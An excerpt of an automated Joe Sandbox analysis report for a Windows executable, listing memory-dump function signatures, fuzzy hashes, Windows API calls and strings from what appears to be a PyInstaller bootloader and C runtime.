                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 561f36ce20f8d9876c061068123aba0c8bd1c0d51e69060b0fd72c9c26a91bd8
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22315E32A18E1285EA516F5D884137C3A92AF84B94FC103B5EF5DC73D2CEBCA4418715
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                                                                                                        • Instruction ID: d158c404bbb1e4feafd67e5fdc12f0abf367c049a39065c67b62ca2a53a296a1
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4217A72E14B468EEB648F68C4902EC33A1FB44718F84467ADB6DC6AD5DF38D584CB40
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 9f4c7147dfa47939fd776ed0faefe9f973fa16268f0bc98a83545da7d521671b
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44117531E1CE4182FAA09F5994001BDA666BF85B84FC44672EF4DD7B96CF3DD4008700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0b51025a930cd07badc35c3cc97dbc5f21194d3d47be7299de1440cbcf87ece4
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D219232A18B8186DB618F1CD8413797AA1FB84B54F545234EF5DC76D9EF3CD4518B00
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 422d9f1954e68c8f767eb45eda4488e6bd0fc683700c8d32fe1718e3f714c45c
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29018821B08F4541E904DF5A99421A9AA96FF86FE0F8847B1DF5CD7BD6DE3CD5014700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,00000000,00007FF6BA3BB32A,?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A), ref: 00007FF6BA3BEBED
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8882c5eb4bd230fe5bcbe8ede7195bf55261286b9ff7d48f2077dfc522faf57c
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68F01254B0DB1682FE5997AD98552B552965F88B40FAC47B0CF0FC63D1ED1CE4814310
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF6BA3B0C90,?,?,?,00007FF6BA3B22FA,?,?,?,?,?,00007FF6BA3B3AE9), ref: 00007FF6BA3BD63A
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 740c7bfd3d3b2ec6e199cfb04274249a64034ef9177ba3c6e438c5b73f8f8ddd
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4CF0F810F19B4745FEA85B7A58517B912925FC47E0FC807B0DF2EC62C2EE3CA4808720
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5840
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5852
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5889
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A589B
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A58B4
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A58C6
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A58DF
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A58F1
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A590D
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A591F
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A593B
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A594D
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5969
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A597B
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5997
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A59A9
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A59C5
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A59D7
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                                                                                        • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                                                                                        • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                                                                                        • Instruction ID: a7bdb1486f0234e0303d3add4b3b2ed7e4a09d5202b0bc22dd93af5543ed65ed
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA22BE74A09B37A1FA549F6DAC145B863A5BF14781F4890B6DE2EC2260FF3CB589C350
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                                                                        • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 9343d6cfe8d8acdfccb228a07d02e2ae696a547445aa9bb474c06ba9a358bff8
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20B2B272E183A28BE7A58E68D9447FD77A1FB54388F505175DF0AD7A84EF38A900CB40
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-2665694366
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 33add4381013bbce853c33657467b4592de908ee64912155ed6161dc6c7eb98a
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9052A272A146B68BDBA48F18D458B7E3BAAEB45340F418179EB4AC7780DF3DD944CB40
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2a263cee899eb05c8893552b5cfa0bc6d4b8e3c0ba065ec74635e73e455b4807
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53313E72A08B918AEB609F64E8803EE7365FB84744F44407ADB4E87B98EF3CD548C710
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6BA3C5C45
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3C5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C55AC
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3BA948: RtlFreeHeap.NTDLL(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA95E
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3BA948: GetLastError.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA968
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3BA900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6BA3BA8DF,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BA909
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3BA900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6BA3BA8DF,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BA92E
                                                                                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6BA3C5C34
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3C55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C560C
                                                                                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6BA3C5EAA
                                                                                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6BA3C5EBB
                                                                                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6BA3C5ECC
                                                                                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6BA3C610C), ref: 00007FF6BA3C5EF3
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
